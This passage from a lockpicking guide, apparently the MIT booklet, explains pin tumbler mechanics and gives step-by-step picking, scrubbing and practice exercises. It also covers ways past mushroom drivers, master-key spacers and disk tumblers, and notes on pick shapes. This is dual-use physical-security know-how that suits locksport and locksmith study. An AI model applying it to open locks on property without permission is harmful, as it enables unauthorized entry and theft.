practicing on many different locks. Anyone can learn how to open
desk and filing cabinet locks, but the ability to open most
locks in under thirty seconds is a skill that requires practice.
Before getting into the details of locks and picking, it is
worth pointing out that lockpicking is just one way to bypass a
lock, though it does cause less damage than brute force
techniques. In fact, it may be easier to bypass the bolt
mechanism than to bypass the lock. It may also be easier to
bypass some other part of the door or even avoid the door
entirely. Remember: There is always another way, usually a
better one.
Chapter 2
HOW A KEY OPENS A LOCK
This chapter presents the basic workings of pin tumbler
locks, and the vocabulary used in the rest of this booklet. The
terms used to describe locks and lock parts vary from
manufacturer to manufacturer and from city to city, so even if
you already understand the basic workings of locks, you should
look at Figure 2.1 for the vocabulary.
Knowing how a lock works when it is opened by a key is only
part of what you need to know. You also need to know how a lock
responds to picking. Chapters 3 and 5 present models which will
help you understand a lock's response to picking.
Figure 2.1 introduces the vocabulary of real locks. The key
is inserted into the "keyway" of the "plug." The protrusions on
the side of the keyway are called "wards." Wards restrict the
set of keys that can be inserted into the plug. The plug is a
cylinder which can rotate when the proper key is fully inserted.
The non-rotating part of the lock is called the "hull." The
first pin touched by the key is called pin one. The remaining
pins are numbered increasingly toward the rear of the lock.
The proper key lifts each pin pair until the gap between
the "key pin" and the "driver pin" reaches the "sheer line."
When all the pins are in this position, the plug can rotate and
the lock can be opened. An incorrect key will leave some of the
pins protruding between the hull and the plug, and these pins
will prevent the plug from rotating.
Chapter 3
THE FLATLAND MODEL
In order to become good at picking locks, you will need a
detailed understanding of how locks works and what happens as it
is picked. This document uses two models to help you understand
the behavior of locks. This chapter presents a model that
highlights interactions between pin positions. Chapter 4 uses
this model to explain how picking works. Chapter 9 will use this
model to explain complicated mechanical defects.
The "flatland" model of a lock is shown in Figure 3.1 This
is not a cross section of a real lock. It is a cross section of
a very simple kind of lock. The purpose of this lock is to keep
two plates of metal from sliding over each other unless the
proper key is present. The lock is constructed by playing the
two plates over each other and drilling holes which pass through
both plates. The figure shows a two hole lock. Two pins are
placed in each hole such that the gap between the pins does not
line up with the gap between the plates. The bottom pin is
called the "key pin" because it touches the key. The top pin is
called the "driver pin." Often the driver and the key pins are
just called the driver and the pin. A protrusion on the
underside of the bottom plate keeps the pins from falling out,
and a spring above the top plates pushed down on the driver pin.
If the key is absent, the plates cannot slide over each
other because the driver pins pass through both plates. See
Figure 3.3. That is, the key lifts the key pin until its top
reaches the lock's sheer line. In this configuration the plates
can slide past each other.
Figure 3.3 also illustrates one of the important features
of real locks. There is always a sliding allowance. That is, any
parts which will slide past each other must be separated by a
gap. The gap between the top and bottom plates allows a range of
keys to open the lock. Notice that the right key pin in Figure
3.3 is not raised as high as the left pin, yet the lock will
still open.
Chapter 4
BASIC PICKING & THE BINDING DEFECT
The flatland model highlights the basic defect that enables
lockpicking to work. This defect makes it possible to open a
lock by lifting the pins one at a time, and thus you don't need
a key to lift all the pins at the same time. Figure 4.3 shows
how the pins of a lock can be set one at a time. The first step
of the procedure is to apply a sheer force to the lock by
pushing on the bottom plate. This force causes one or more the
of pins to be scissored between the top and bottom plate. The
most common defect in a lock is that only one pin will bind.
Figure 4.3a shows the left pin binding. Even though a pin is
binding, it can be pushed up with a picking tool; see Figure
4.3b. When the top of the key pin reaches the sheer line, the
bottom plate will slide slightly. If the pick is removed the
driver pin will be held up by the overlapping bottom plate, and
the key pin will drop down to its initial position; see Figure
4.3c. The slight movement of the bottom plate causes a new pin
to bind. The same procedure can be used to set the new pin.
Thus, the procedure for "one pin at a time picking" a lock
is to apply a sheer force, find the pin which is binding the
most and push it up. When the top of the key pin reaches the
sheer line, the moving portion of the lock will give slightly,
and driver pin will be trapped above the sheer line. This is
called "setting" a pin.
Chapter 9 discusses the different defects that cause pins
to bind one at a time.
1 Apply a sheer force.
2 Find the pin that is binding the most.
3 Push that pin up until you feel it set at the sheer line.
4 Go to step 2.
Table 4.1: Figure 5: Picking a lock one pin at a time.
Chapter 5
The Pin Column Model
The flatland model of locks can explain effects that
involve more than one pin, but a different model is needed to
explain the detailed behavior of a single pin. See Figure 5.1.
The pin-column model highlights the relationship between the
torque applied and the amount of force needed to lift each pin.
It is essential that you understand this relationship.
In order to understand the "feel" of lockpicking you need
to know how the movement of a pin is affected by the torque
applied by your torque wrench (tensioner) and the pressure
applied by your pick. A good way to represent this understanding
is a graph that shows the minimum pressure needed to move a pin
as a function of how far the pin has been displaced from its
initial position. The remainder of this chapter will describe
that force graph from the pin-column model.
Figure 5.2 shows a single pin position after torque has
been applied to the plug. The forces acting on the driver pin
are the friction from the sides, the spring contact force from
above, and the contact force from the key pin below. The amount
of pressure you apply to the pick determines the contact force
from below.
The spring force increases as the pins are pushed into the
hull, but the increase is slight, so we will assume that the
spring force is constant over the range of displacements we are
interested in. The pins will not move unless you apply enough
pressure to overcome the spring force. The binding friction is
proportional to how hard the driver pin is being scissored
between the plug and the hull, which in this case is
proportional to the torque. The more torque you apply to the
plug, the harder it will be to move the pins. To make a pin
move, you need to apply a pressure that is greater than the sum
of the spring and friction forces.
When the bottom of the driver pin reaches the sheer line,
the situation suddenly changes. See Figure 5.3. The friction
binding force drops to zero and the plug rotates slightly (until
some other pin binds). Now the only resistance to motion is the
spring force. After the top of the key pin crosses the gap
between the plug and the hull, a new contact force arises from
the key pin striking the hull. This force can be quite large,
and it causes a peak in the amount of pressure needed to move a
pin.
If the pins are pushed further into the hull, the key pin
acquires a binding friction like the driver pin had in the
initial situation. See Figure 5.4. Thus, the amount of pressure
needed to move the pins before and after the sheer line is about
the same. Increasing the torque increases the required pressure.
At the sheer line, the pressure increases dramatically due to
the key pin hitting the hull. This analysis is summarized
graphically in Figure 5.5.
Chapter 6
Basic Scrubbing
At home you can take your time picking a lock, but in the
field, speed is always essential. This chapter presents a
lockpicking technique called "scrubbing" that can quickly open
most locks.
The slow step in basic picking (Chapter 4) is locating the
pin which is binding the most. The force diagram (Figure 5.5)
developed in Chapter 5 suggests a fast way to select the correct
pin to lift. Assume that all the pins could be characterized by
the same force diagram. That is, assume that they all bind at
once and that they all encounter the same friction. Now consider
the effect of running the pick over all the pins with a pressure
that is great enough to overcome the spring and friction forces
but not great enough to overcome the collision force of the key
pin hitting the hill. Any pressure that is above the flat
portion of the force graph and below the top of the peak will
work. As the pick passes over a pin, the pin will rise until it
hits the hull, but it will not enter the hull. See Figure 5.3.
The collision force at the sheer line resists the pressure of
the pick, so the pick rides over the pin without pressing it
into the hull. If the proper torque is being applied, the plug
will rotate slightly. As the pick leaves the pin, the key pin
will fall back to its initial position, but the driver pin will
catch on the edge of the plug and stay above the sheer line. See
Figure 6.1. In theory one stroke of the pick over the pins will
cause the lock to open.
In practice, at most one or two pins will set during a
single stroke of the pick, so several strokes are necessary.
Basically, you use the pick to scrub back and forth over the
pins while you adjust the amount of torque on the plug. The
exercises in Chapter 8 will teach you how to choose the correct
torque and pressure.
You will find that the pins of a lock tend to set in a
particular order. Many factors effect this order (See Chapter
9), but the primary cause is a misalignment between the center
axis of the plug and the axis on which the holes were drilled.
See Figure 6.2. If the axis of the pin holes is skewed from the
center line of the plug, then the pins will set from back to
front if the plug is turned one way, and from front to back if
the plug is turned the other way. Many locks have this defect.
Scrubbing is fast because you don't need to pay attention
to individual pins. You only need to find the correct torque and
pressure. Figure 6.1 summarizes the steps of picking a lock by
scrubbing. The exercises will teach you how to recognize when a
pin is set and how to apply the correct forces. If a lock
doesn't open quickly, then it probably has one of the
characteristics described in Chapter 9 and you will have to
concentrate on individual pins.
1 Insert the pick and torque wrench. Without
applying any torque pull the pick out to get
a feel for the stiffness of the lock's
springs.
2 Apply a light torque. Insert the pick
without touching the pins. As you pull the
pick out, apply pressure to the pins. The
pressure should be slightly larger than the
minimum necessary to overcome the spring
force.
3 Gradually increase the torque with each
stroke of the pick until pins begin to set.
4 Keeping the torque fixed, scrub back and
fourth over the pins that have not set. If
additional pins do not set, release the
torque and start over with the torque found
in the last step.
5 Once the majority of the pins have been set,
increase the torque and scrub the pins with
a slightly larger pressure. This will set
any pins which have not set low due to
beveled edges, etc.
Table 6.1: Figure 13 - Basic scrubbing
Chapter 7
Advanced Lockpicking
Simple lockpicking is a trade that anyone can learn.
However, advanced lockpicking is a craft that requires
mechanical sensitivity, physical dexterity, visual concentration
and analytic thinking. If you strive to excel at lockpicking,
you will grow in many ways.
7.1 Mechanical Skills
Learning how to pull the pick over the pins is surprisingly
difficult. The problem is that the mechanical skills you learned
early in life involved maintaining a fixed position or fixed
path for your hands independent of the amount of force required.
In lockpicking, you must learn how to apply a fixed force
independent of the position of your hand. As you pull the pick
out of the lock you want to apply a fixed pressure on the pins.
The picks should bounce up and down in the keyway according to
the resistance offered by each pin.
To pick a lock you need feedback about the effects of your
manipulations. To get the feedback, you must train yourself to
be sensitive the sound and the feel of the pick passing over the
pins. This is a mechanical skill that can only be learned with
practice. The exercises will help you recognize the important
information coming from your fingers.
7.2 Zen and the Art of Lockpicking
In order to excel at lockpicking, you must train yourself
to have a visually reconstructive imagination. The idea is to
use information from all your senses to build a picture of what
is happening inside the lock as you pick it. Basically, you want
to project your senses into the lock to receive a full picture
of how it is responding to your manipulations. Once you have
learned how to build this picture, it is easy to choose
manipulations that will open the lock.
All your senses provide information about the lock. Touch
and sound provide the most information, but the other senses can
reveal critical information. For example, your nose can tell
whether a lock has been lubricated recently. As a beginner, you
will need to use your eyes for hand-eye coordination, but as you
improve you will find it unnecessary to look at the lock. In
fact, it is better to ignore your eyes or your sight to build an
image of the lock based on the information you receive from your
fingers and ears.
The goal of this mental skill is to acquire a relaxed
concentration on the lock. Don't force the concentration. Try to
ignore the sensations and thoughts that are not related to the
lock. Don't try to focus on the lock.
7.3 Analytic Thinking
Each lock has its own special characteristics which make
picking harder or easier. If you learn to recognize and exploit
the "personality traits" of locks, picking will go much faster.
Basically, you want to analyze the feedback you get from the
lock to diagnose its personality traits and then use your
experience to decide on an approach to open a lock. Chapter 9
discusses a large number of common traits and ways to exploit or
overcome them.
People underestimate the analytic involved in lockpicking.
They think that the picking tool opens the lock. To them the
torque wrench is a passive tool that just puts the lock under
the desired stress. Let me propose another way to view the
situation. The pick is just running over the pins to get
information about the lock. Based on an analysis of that
information, the torque is adjusted to make the pins set at the
sheer line. It's the torque wrench that opens the lock.
Varying the torque as the picks moves in and out of the
keyway is a general trick that can be used to get around several
picking problems. For example, if the middle pins are set, but
the ends pins are not, you can increase the torque as the pick
moves over the middle pins. This will reduce the chances of
disturbing the correctly set pins. If some pin doesn't seem to
lift up far enough as the pick passes over it, then try reducing
the torque on the next pass.
The skill of adjusting the torque while the pick is moving
requires careful coordination between your hands, but as you
become better at visualizing the process of picking the lock,
you will become better at this important skill.
Chapter 8
Exercises
This chapter presents a series of exercises that will help
you learn the basic skill of lockpicking. Some exercises teach a
single skill, while others stress the coordination of skills.
When you do these exercises, focus on the skills, not on
opening the lock. If you focus on opening the lock, you will get
frustrated and your mind will stop learning. The goal of each
exercise is to learn something about the particular lock you are
holding and something about yourself. If a lock happens to open,
focus on the memory of what you were doing and what you felt
just before it opened.
These exercises should be practiced in short sessions.
After about thirty minutes you will find that your fingers
become sore and your mind looses its ability to achieve relaxed
concentration.
8.1 Exercise 1: Bouncing the pick
This exercise helps you learn the skill of applying a fixed
pressure with the pick independent of how the pick moves up and
down in the lock. Basically you want to learn how to let the
pick bounce up and down according to the resistance offered by
each pin.
How you hold the pick makes a different on how easy it is
to apply a fixed pressure. You want to hold it in such a way
that the pressure comes from your fingers or your wrist. Your
elbow and shoulder do not have the dexterity required to pick
locks. While you are scrubbing a lock notice which of your
joints are fixed, and which are allowed to move. The moving
joints are providing the pressure.
One way to hold a pick is to use two fingers to provide a
pivot point while another finger levers the pick to provide the
pressure. Which fingers you use is a matter of personal choice.
Another way to hold the pick is like holding a pencil. With this
method, your wrist provides the pressure. If your wrist is
providing the pressure, your shoulder and elbow should provide
the force to move the pick in and out of the lock. Do not use
your wrist to both move the pick and apply pressure.
A good way to get used to the feel of the pick bouncing up
and down in the keyway is to try scrubbing over the pins of an
open lock. The pins cannot be pushed down, so the pick must
adjust to the heights of the pins. Try to feel the pins rattle
as the pick moves over them. If you move the pick quickly, you
can hear the rattle. This same rattling feel will help you
recognize when a pin is set correctly. If a pin appears to be
set but it doesn't rattle, then it is false set. False set pins
can be fixed by pushing them down farther, or by releasing
torque and letting them pop back to their initial position.
One last word of advice. Focus on the tip of the pick.
Don't think about how you are moving the handle; think about how
you are moving the tip of the pick.
8.2 Exercise 2: Picking pressure
This exercise will teach you the range of pressures you
will need to apply with a pick. When you are starting, just
apply pressure when you are drawing the pick out of the lock.
Once you have mastered that, try applying pressure when the pick
is moving inward.
With the flat side of your pick, push down on the first pin
of a lock. Don't apply any torque to the lock. The amount of
pressure you are applying should be just enough to overcome the
spring force. This force gives you an idea of the minimum
pressure you will apply with a pick.
The spring force increases as you push the pin down. See if
you can feel this increase.
Now see how it feels to push down the other pins as you
pull the pick out of the lock. Start out with both the pick and
torque wrench in the lock, but don't apply any torque. As you
draw the pick out of the lock, apply enough pressure to push
each pin all the way down.
The pins should spring back as the pick goes past them.
Notice the sound that the pins make as they spring back. Notice
the popping feel as a pick goes past each pin. Notice the
springy feel as the pick pushes down on each new pin.
To help you focus on these sensations, try counting the
number of pins in the lock. Door locks at MIT have seven pins;
padlocks usually have four.
To get an idea of the maximum pressure, use the flat side
of your pick to push down all the pins in the lock. Sometimes
you will need to apply this much pressure to a single pin. If
you encounter a new kind of lock, perform this exercise to
determine the stiffness of its springs.
8.3 Exercise 3: Picking Torque
This exercise will teach you the range of torque you will
need to apply to a lock. It demonstrates the interaction between
the torque and pressure which was described in Chapter 5.
The minimum torque you will use is just enough to overcome
the friction of rotating the plug in the hull. Use your torque
wrench to rotate the plug until it stops. Notice how much torque
is needed to move the plug before the pins bind. This force can
be quite high for locks that have been left out in the rain. The
minimum torque for padlocks includes the force of a spring that
is attached between the plug and the shackle bolt.
To get a feel for the maximum value of torque, use the flat
side of the pick to push all the pins down, and try applying
enough torque to make the pins stay down after the pick is
removed. If your torque wrench has a twist in it, you may not be
able to hold down more than a few pins.
If you use too much torque and too much pressure you can
get into a situation like the one you just created. The key pins
are pushed too far into the hull and the torque is sufficient to
hold them there.
The range of picking torque can be found by gradually
increasing the torque while scrubbing the pins with the pick.
some of the pins will become harder to push down. Gradually
increase the torque until some of the pins set. These pins will
loose their springiness. Keeping the torque fixed, use the pick
to scrub the pins a few times to see if other pins will set.
The most common mistakes of beginners is to use too much
torque. Use this exercise to find the minimum torque required to
pick the lock.
8.4 Exercise 4: Identifying Set Pins
While you are picking a lock, try to identify which pins
are set. You can tell a pin is set because it will have a slight
give. That is, the pin can be pushed down a short distance with
a light pressure, but it becomes hard to move after that
distance (see Chapter 6 for an explanation). When you remove the
light pressure, the pin springs back up slightly. Set pins also
rattle if you flick them with the pick. Try listening for that
sound.
Run the pick over the pins and try to decide whether the
set pins are in the front or back of the lock (or both). Try
identifying exactly which pins are set. Remember that pin one is
the frontmost pin (i.e., the pin that a key touches first). The
most important skill of lockpicking is the ability to recognize
correctly set pins. This exercise will teach you that skill.
Try repeating this exercise with the plug turning in the
other direction. If the front pins set when the plug is turned
one way, the back pins will set when the plug is turned the
other way. See Figure 6.2 for an explanation.
One way to verify how many pins are set is to release the
torque, and count the clicks as the pins snap back to their
initial position. Try this. Try to notice the difference in
sound between the snap of a single pin and the snap of two pins
at once. A pin that has been false set will also make a snapping
sound.
Try this exercise with different amounts of torque and
pressure. You should notice that a larger torque requires a
larger pressure to make pins set correctly. If the pressure is
too high, the pins will be jammed into the hull and stay there.
8.5 Exercise 5: Projection
As you are doing the exercises, try building a picture in
your mind of what is going on. The picture does not have to be
visual, it could be a rough understanding of which pins are set
and how much resistance you are encountering from each pin. One
way to foster this picture building is to try to remember your
sensations and beliefs about a lock just before it opened. When
a lock opens, don't thing "that's over", think "what happened."
This exercise requires a lock that you find easy to pick.
It will help you refine the visual skills you need to master
lockpicking. Pick the lock, and try to remember how the process
felt. Rehearse in your mind how everything feels when the lock
is picked properly. Basically, you want to create a movie that
records the process of picking the lock. Visualize the motion of
your muscles as they apply the correct pressure and torque, and
feel the resistance encountered by the pick. Now pick the lock
again trying to match your actions to the movie.
By repeating this exercise, you are learning how to
formulate detailed commands for your muscles and how to
interpret feedback from your senses. The mental rehearsal
teaches you how to build a visual understanding of the lock and
how to recognize the major steps of picking it.
Chapter 9
Recognizing and Exploiting Personality Traits
Real locks have a wide range of mechanical features and
defects that help and hinder lockpicking. If a lock doesn't
respond to scrubbing, then it probably has one of the traits
discussed in this chapter. To open the lock, you must diagnose
the trait and apply the recommended technique. The exercises
will help you develop the mechanical sensitivity and dexterity
necessary to recognize and exploit the different traits.
9.1 Which Way To Turn
It can be very frustrating to spend a long time picking a
lock and then discover that you turned the plug the wrong way.
If you turn a plug the wrong way it will rotate freely until it
hits a stop, or until it rotates 180 degrees and the drivers
enter the keyway (see Section 9.11). Section 9.11 also explains
how to turn the plug more than 180 degrees if that is necessary
to fully retract the bolt. When the plug is turned in the
correct direction, you should feel an extra resistance when the
plug cam engages the bolt spring.
The direction to turn the plug depends on the bolt
mechanism, not on the lock, but here are some general rules.
Cheap padlocks will open if the plug is turned in either
direction, so you can chose the direction which is best for the
torque wrench. All padlocks made by the Master company can be
opened in either direction. Padlocks made by Yale will only open
if the plug is turned clockwise. The double plug Yale cylinder
locks generally open by turning the bottom of the keyway (i.e.,
the flat edge of the key) away from the nearest door frame.
Single plug cylinder locks also follow this rule. See Figure
9.1. Locks built into the doorknob usually open clockwise. Desk
and filing cabinet locks also tend to open clockwise.
When you encounter a new kind of lock mechanism, try
turning the plug in both directions. In the correct direction,
the plug will be stopped by the pins, so the stop will feel
mushy when you use heavy torque. In the wrong direction the plug
will be stopped by a metal tab, so the stop will feel solid.
9.2 How Far to Turn
The companion question to which way to turn a lock is how
far to turn it. Desk and filing cabinet locks generally open
with less than a quarter turn. Locks which are separate from the
doorknob tend to require a half turn to open. Deadbolt lock
mechanisms can require almost a full turn to open.
Turning a lock more than 180 degrees is difficult because
the drivers enter the bottom of the keyway. See Section 9.11.
9.3 Gravity
Picking a lock that has the springs at the top is different
than picking one with the springs at the bottom. It should be
obvious how to tell the two apart. The nice feature of a lock
with the springs at the bottom is that gravity holds the key
pins down once they set. With the set pins out of the way, it is
easy to find and manipulate the remaining unset pins. It is also
straight forward to test for the slight give of a correctly set
pin. When the springs are on top, gravity will pull the key pins
down after the driver pin catches at the sheer line. In this
case, you can identify the set pins by noticing that the key pin
is easy to lift and that it does not feel springy. Set pins also
rattle as you draw the pick over them because they are not being
pushed down by the driver pin.
9.4 Pins Not Setting
If you scrub a lock and pins are not setting even when you
vary the torque, then some pin has a false set and it is keeping
the rest of the pins from setting. Consider a lock whose pins
appear to set from back to front. If the backmost pin false sets
high or low (see Figure 9.2), then the plug cannot rotate enough
to allow the other bins to bind. It is hard to recognize that a
pin has false set because the springiness of the front pins
makes it hard to sense the small give of a correctly set back
pin. The main symptom of this situation is that the other pins
will not set unless a very large torque is applied.
When you encounter this situation, release the torque and
start over by concentrating on the back pins. Try a light torque
and moderate pressure, or heavy torque and heavy pressure. Try
to feel for the click that happens when a pin reaches the sheer
line and the plug rotates slightly. The click will be easier to
feel if you use a stiff torque wrench.
9.5 Elastic Deformation
The interesting events of lockpicking happen over distances
measured in thousandths of an inch. Over such short distances,
metals behave like springs. Very little force is necessary to
deflect a piece metal over those distances, and when the force
is removed, the metal will spring back to its original position.
Deformation can be used to your advantage if you want to
force several pins to bind at once. For example, picking a lock
with pins that prefer to be set from front to back is slow
because the pins set one at a time. This is particularly true if
you only apply pressure as the pick is drawn out of the lock.
Each pass of the pick will only set the frontmost pin that is
binding. Numerous passes are required to set all the pins. If
the preference for setting is not very strong (i.e., the axis of
the plug holes is only slightly skewed from the plug's center
line), then you can cause additional pins to bind by applying
extra torque. Basically, the torque puts a twist in the plug
that causes the front of the plug to be deflected further than
the back of the plug. With light torque, the back of the plug
stays in its initial position, but with medium to heavy torque,
the front pin columns bend enough to allow the back of the plug
to rotate and thus cause the back pins to bind. With the extra
torque, a single stroke of the pick can set several pins, and
the lock can be opened quickly. Too much torque causes its own
problems.
When the torque is large, the front pins and plug holes can
be deformed enough to prevent the pins from setting correctly.
In particular, the first pin tends to false set low. Figure 9.2
shows how excess torque can deform the bottom of the driver pin
and prevent the key pin from reaching the sheer line. This
situation can be recognized by the lack of give in the first
pin. Correctly set pins feel springy if they are pressed down
slightly. A falsely set pin lacks this springiness. The solution
is to press down hard on the first pin. You may want to reduce
the torque slightly, but if you reduce torque too much then the
other pins will unset as the first pin is being depressed.
It is also possible to deform the top of the key pin. The
key pin is scissored between the plug and the hull and stays
fixed. When this happens, the pin is said to be "false set
high."
9.6 Loose Plug
The plug is held in the hull by being wider at the front
and by having a cam on the back that is bigger than the hole
drilled into the hull. If the cam is not properly installed, the
plug can move in and out of the lock slightly. On the outward
stroke of the pick, the plug will move forward and in and out of
the lock slightly. On the outward stroke of the pick, the plug
will move forward, and if you apply pressure on the inward
stroke, the plug will be pushed back.
The problem with a loose plug is that the driver pins tend
to set on the back of the plug holes rather than on the sides of
the holes. When you push the plug in, the drivers will unset.
You can use this defect to your advantage by only applying
pressure on the outward or inward stroke of the pick.
Alternatively, you can use your finger or torque wrench to
prevent the plug from moving forward.
9.7 Pin Diameter
When the pair of pins in a particular column have different
diameters, that column will react strangely to the pressure of
the pick.
The top half of Figure 9.3 shows a pin column with a driver
pin that has a larger diameter than the key pin. As the pins are
lifted, the picking pressure is resisted by the binding friction
and the spring force. Once the driver clears the sheer line, the
plug rotates (until some other pin binds) and the only
resistance to motion is the spring force. If the key pin is
small enough and the plug did not rotate very far, the key pin
can enter the hull without colliding with the edge of the hull.
Some other pin is binding, so again the only resistance to
motion is the spring force. This relationship is graphed in the
bottom half of the figure. Basically, the pins feel normal at
first, but then the lock clicks and the pin becomes springy. The
narrow key pin can be pushed all the way into the hull without
loosing its springiness, but when the picking pressure is
released, the key pin will fall back to its initial position
while the large driver catches on the edge of the plug hole.
The problem with a large driver pin is that the key pin
tends to get in the hull when some other pin sets. Imagine that
a neighboring pin sets and the plug rotates enough to bind the
narrow key pin. If the pick was pressing down on the narrow key
pin at the same time as it was pressing down on the pin that
set, then the narrow key pin will be in the hull and it will get
stuck there when the plug rotates.
The behavior of a large key pin is left as an exercise for
the reader.
9.8 Beveled Holes and Rounded pins
Some lock manufacturers (e.g., Yale) bevel the edges of the
plug holes and/or round off the ends of the key pins. This tends
to reduce the wear on the lock and it can both help and hinder
lockpicking. You can recognize a lock with these features by the
large give in set pins. See Figure 9.4. That is, the distance
between the height at which the driver pin catches on the edge
of the plug hole and the height at which the driver pin catches
on the edge of the plug hole and the height at which the key pin
hits the hull is larger (sometimes as large as a sixteenth of an
inch) when the plug holes are beveled or the pins are rounded.
While the key pin is moving between those two heights, the only
resistance to motion will be the force of the spring. There
won't be any binding friction. This corresponds to the dip in
the force graph shown in Figure 5.5
A lock with beveled plug holes requires more scrubbing to
open than a lock without beveled holes because the driver pins
set on the bevel instead of setting on the top of the plug. The
plug will not turn if one of the drivers is caught on a bevel.
The key pin must be scrubbed again to push the driver pin up and
off the bevel. The left driver pin in Figure 9.6a is set. The
driver is resting on the bevel, and the bottom plate has moved
enough to allow the right driver to bind. Figure 9.6b shows what
happens after the right driver pin sets. The bottom plate slides
further to the right and now the left driver pin is scissored
between the bevel and the top plate. It is caught on the bevel.
To open the lock, the left driver pin must be pushed up above
the bevel. Once that driver is free, the bottom plate can slide
and the right driver may bind on its bevel.
If you encounter a lock with beveled plug holes, and all
the pins appear to be set but the lock is not opening, you
should reduce torque and continue scrubbing over the pins. The
reduced torque will make it easier to push the drivers off the
bevels. If pins unset when you reduce the torque, try increasing
the torque and picking pressure. The problem with increasing the
force is that you may jam some key pins into the hull.
9.9 Mushroom Driver Pins
A general trick that lock makers use to make picking harder
is to modify the shape of the driver pin. The most popular
shapes are mushroom, spool and serrated; see Figure 9.7. The
purpose of these shapes is to cause the pins to false set low.
These drivers stop a picking technique called vibration picking
(see Section 9.12), but they only slightly complicate scrubbing
and one-pin-at-a-time picking (see Chapter 4).
If you pick a lock and the plug stops turning after a few
degrees and none of the pins can be pushed up any further, then
you known that the lock has modified drivers. Basically, the lip
of the driver has caught at the sheer line. See the bottom of
Figure 9.7. Mushroom and spool drivers are often found in
Russwin locks, and locks that have several spacers for master
keying.
You can identify the positions with the mushroom drivers by
applying a light torque and pushing up on each pin. The pins
with mushroom drivers will exhibit a tendency to bring the plug
back to the fully locked position. By pushing the key pin up you
are pushing the flat top of the key pin against the tilted
bottom of the mushroom driver. This causes the drive to
straighten up which in turn causes the plug to unrotate. You can
use this motion to identify the columns that have mushroom
drivers. Push those pins up to sheer line; even if you lose some
of the other pins in the process they will be easier to re-pick
than the pins with mushroom drivers. Eventually all the pins
will be correctly set at the sheer line.
One way to identify all the positions with mushroom drivers
is to use the flat of your pick to push all the pins up about
halfway. This should put most of the drivers in their cockable
position and you can feel for them.
To pick a lock with modified drivers, use a lighter torque
and heavier pressure. you want to error on the side of pushing
the key pins too far into the hull. In fact, another way to pick
these locks is to use the flat side of your pick to push the
pins up all the way, and apply very heavy torque to hold them
there. Use a scrubbing action to vibrate the key pins while you
slowly reduce the torque. Reducing the torque reduces the
binding friction on the pins. The vibration and spring force
cause the key pins to slide down to the sheer line.
The key to picking locks with modified drivers is
recognizing incorrectly set pins. A mushroom driver set on its
lip will not have the springy give of a correctly set driver.
Practice recognizing the difference.
9.10 Master Keys
Many applications require keys that open only a single lock
and keys that open a group of locks. The keys that open a single
lock are called "change keys" and the keys that open multiple
locks are called "master keys." To allow both the change key and
the master key to open the same lock, a locksmith adds an extra
pin called a "spacer" to some of the pin columns. See Figure
9.8. The effect of the spacer is to create two gaps in the pin
column that could be lined up with the sheer line. Usually the
change key aligns the top of the spacer with the sheer line, and
the master key aligns the bottom of the spacer with the sheer
line (the idea is to prevent people from filing down a change
key to get a master key). In either case the plug is free to
rotate.
In general, spacers make a lock easier to pick. They
increase the number of opportunities to set each pin, and they
make it more likely that the lock can by opened by setting all
the pins at about the same height. In most cases only two or
three positions will have spacers. You can recognize a position
with a spacer by the two clicks you feel when the pin is pushed
down. If the spacer has a smaller diameter than the driver and
key pins, then you will feel a wide springy region because the
spacer will not bind as it passes through the sheer line. It is
more common for the spacer to be larger than the driver pin. You
can recognize this by an increase in friction when the spacer
passes through the sheer line. Since the spacer is larger than
the driver pin, it will also catch better on the plug. If you
push the spacer further into the hull, you will feel a strong
click when the bottom of the spacer clears the sheer line.
Thin spacers can cause serious problems. If you apply heavy
torque and the plug has beveled holes, the spacer can twist and
jam at the sheer line. It is also possible for the spacer to
fall into the keyway if the plug is rotated 180 degrees. See
Section 9.11 for the solution to this problem.
9.11 Driver or Spacer Enters Keyway
Figure 9.9 shows how a spacer or driver pin can enter the
keyway when the plug is rotated 180 degrees. You can prevent
this by placing the flat side of your pick in the bottom of the
keyway BEFORE you turn the plug too far. If a spacer or driver
does enter the keyway and prevent you from turning the plug, use
the flat side of your pick to push the spacer back into the
hull. You may need to use the torque wrench to relieve any sheer
force that is binding the spacer or driver. If that doesn't
work, try raking over the drivers with the pointed side of your
pick. If a spacer falls into the keyway completely, the only
option is to remove it. A hook shaped piece of spring steel
works well for this, though a bent paperclip will work just as
well unless the spacer becomes wedged.
9.12 Vibration Picking
Vibration picking works by creating a large gap between the
key and driver pins. The underlying principle is familiar to
anyone who has played pool. When the queue ball strikes another
ball squarely, the queue ball stops and the other ball heads off
with the same speed and direction as the queue ball. Now imagine
a device that kicks the tips of all the key pins. The key pins
would transfer their momentum to the driver pins which would fly
up into the hull. If you are applying a light torque when this
happens, the plug will rotate when all the drivers are above the
sheer line.
9.13 Disk Tumblers
The inexpensive locks found on desks use metal disks
instead of pins. Figure 9.10 shows the basic workings of these
locks. The disks have the same outline but differ in the
placement of the rectangular cut.
These locks are easy to pick with the right tools. Because
the disks are placed close together a half-round pick works
better than a half-diamond pick (see Figure A.1). You may also
need a torque wrench with a narrower head. Use moderate to heavy
torque.
Chapter 10
Final Remarks
Lockpicking is a craft, not a science. This document
presents the knowledge and skills that are essential to
lockpicking, but more importantly it provides you with models
and exercises that will help you study locks on your own. To
excel at lockpicking, you must practice and develop a style
which fits you personally. Remember that the best technique is
the one that works best for you.
Appendix A
Tools
This appendix describes the design and
construction of lockpicking tools.
A.1 Pick Shapes
Picks come in several shapes and sizes. Figure A.1 shows
the most common shapes. The handle and tang of a pick are the
same for all picks. The handle must be comfortable and the tang
must be thin enough to avoid bumping pins unnecessarily. If the
tang is too thin, then it will act like a spring and you will
loose the feel of the tip interacting with the pins. The shape
of the tip determines how easily the pick passes over the pins
and what kind of feedback you get from each pin.
The design of a tip is a compromise between the ease of
insertion, ease of withdrawal and feel of the interaction. The
half diamond tip with shallow angles is easy to insert and
remove, so you can apply pressure when the pick is moving in
either direction. It can quickly pick a lock that has little
variation in the lengths of the key pins. If the lock requires a
key that has a deep cut between two shallow cuts, the pick may
not be able to push the middle pin down far enough. The half
diamond pick with steep angles could deal with such a lock, and
in general steep angles give you better feedback about the pins.
Unfortunately, the steep angles make it harder to move the pick
in the lock. A tip that has a shallow front angle and a steep
back angle works well for Yale locks.
The half round tip works well in a disk tumbler lock. See
Section 9.13. The full diamond and full round tips are useful
for locks that have pins at the top and bottom of the keyway.
The rake tip is designed for picking pins one by one. It
can also be used to rake over the pins, but the pressure can
only be applied as the pick is withdrawn. The rake tip allows
you to carefully feel each pin and apply varying amounts of
pressure. Some rake tips are flat or dented on the top to make
it easier to align the pick on the pin. The primary benefit of
picking pins one at a time is that you avoid scratching the
pins. Scrubbing scratches the tips of the pins and the keyway,
and it spreads metal dust throughout the lock. If you want to
